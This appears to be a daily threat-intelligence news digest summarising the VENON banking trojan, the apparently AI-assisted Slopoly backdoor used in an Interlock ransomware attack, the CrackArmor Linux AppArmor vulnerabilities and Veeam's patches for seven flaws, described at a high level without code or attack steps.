Cyware Daily Threat Intelligence, March 13, 2026

The Latin American banking sector is facing a strategic upgrade in attacker tooling with the arrival of VENON, a Rust-based trojan that targets 33 Brazilian financial institutions. This shift toward Rust, combined with evasive "ClickFix" social engineering, represents a calculated move by local threat actors to bypass legacy detection and compromise high-value accounts with greater speed and stability.

Financially motivated groups are beginning to integrate generative AI into their development pipelines, as evidenced by the discovery of the Slopoly malware during a recent Interlock ransomware attack. Attributed to the Hive0163 group, this PowerShell-based backdoor features structured logging and variable naming conventions that suggest AI-assisted coding was used to streamline its persistence mechanism.

A decade-long security blind spot in the Linux kernel has been exposed with the disclosure of CrackArmor, a set of nine "confused deputy" vulnerabilities in the AppArmor module. These flaws allow unprivileged local users to manipulate security profiles via pseudo-files, granting a direct path to root-level privilege escalation and the total bypass of container isolation.

Top Malware Reported in the Last 24 Hours

VENON malware targets Brazilian banks

VENON, a new Rust-based banking malware, targets 33 Brazilian financial institutions, marking a shift from traditional Delphi-based malware in Latin America. The malware employs techniques like banking overlay logic, active window monitoring, and shortcut hijacking, resembling other Latin American banking trojans. VENON uses DLL side-loading and social engineering tactics, such as ClickFix, to distribute malicious payloads via PowerShell scripts. It executes advanced evasion techniques (e.g., anti-sandbox, AMSI bypass) and establishes a WebSocket connection to a command-and-control server.

Interlock ransomware uses Slopoly malware

A new malware strain named Slopoly, likely developed using generative AI tools, played a significant role in an Interlock ransomware attack, enabling hackers to remain undetected on a compromised server for over a week while stealing data. This malware, deployed as a PowerShell script, exhibited signs of AI-assisted coding, including structured logging and clear variable names. Researchers from IBM X-Force attributed the attack to the financially motivated group Hive0163, which focuses on extortion through data theft. Although Slopoly is labeled a “Polymorphic C2 Persistence Client,” it lacks true polymorphic capabilities but can generate clients with randomized configurations. The attack was initiated through a ClickFix social engineering tactic and involved additional malware components, highlighting the evolving use of AI in cybercrime.

Top Vulnerabilities Reported in the Last 24 Hours

CrackArmor vulnerabilities threaten Linux security

Nine vulnerabilities, collectively known as "CrackArmor," have been identified in the Linux kernel's AppArmor module, allowing unprivileged users to bypass critical security protections and escalate their privileges to root. These flaws exploit confused deputy vulnerabilities, enabling attackers to manipulate security profiles and execute arbitrary code within the kernel. This manipulation can lead to denial-of-service (DoS) attacks and compromise container isolation guarantees. The vulnerabilities affect all Linux kernels since version 4.11, particularly in distributions like Ubuntu, Debian, and SUSE that have AppArmor enabled by default. The issue has persisted since 2017, and with millions of enterprise Linux instances at risk, the potential for exploitation poses significant threats to system integrity and security.

Veeam issues security updates for 7 flaws

Veeam released updates to fix seven critical vulnerabilities in its Backup & Replication software. Key vulnerabilities include CVE-2026-21666, CVE-2026-21667, CVE-2026-21668, CVE-2026-21672, CVE-2026-21708, CVE-2026-21669, and CVE-2026-21671, with CVSS scores up to 9.9. Exploitation risks include remote code execution, privilege escalation, and file manipulation, particularly for older versions of the software. Veeam advises users to update to versions 12.3.2.4465 or 13.0.1.2067 to mitigate these risks.